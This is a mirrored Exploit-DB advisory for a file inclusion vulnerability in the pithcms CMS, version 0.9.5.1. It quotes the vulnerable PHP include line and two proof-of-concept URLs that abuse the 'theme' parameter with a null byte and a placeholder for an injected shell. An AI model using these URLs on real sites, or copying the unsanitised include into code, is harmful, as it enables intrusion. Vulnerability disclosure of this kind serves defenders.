exploit-db-mirror/exploits/php/webapps/14271.txt
Offensive Security d304cc3d3e DB: 2017-11-24
116602 new exploits

Too many to list!
2017-11-24 20:56:23 +00:00

19 lines
No EOL
537 B
Text

Title: pithcms (theme) Local / remote File inclusion VUlnerability
Version: 0.9.5.1
download: http://sourceforge.net/projects/pithcms/files/
Author: eidelweiss
Contact: g1xsystem[at]windowslive.com
=====================================================================
-=[ CODE ]=-
include ("templates/".$theme."/index.php");
-=[ P0C ]=-
http://127.0.0.1/path/index.php?theme= [LFI]%00
htp://127.0.0.1/path/index.php?theme= [inj3ct0r sh3ll]
=========================| -=[ E0F ]=- |=========================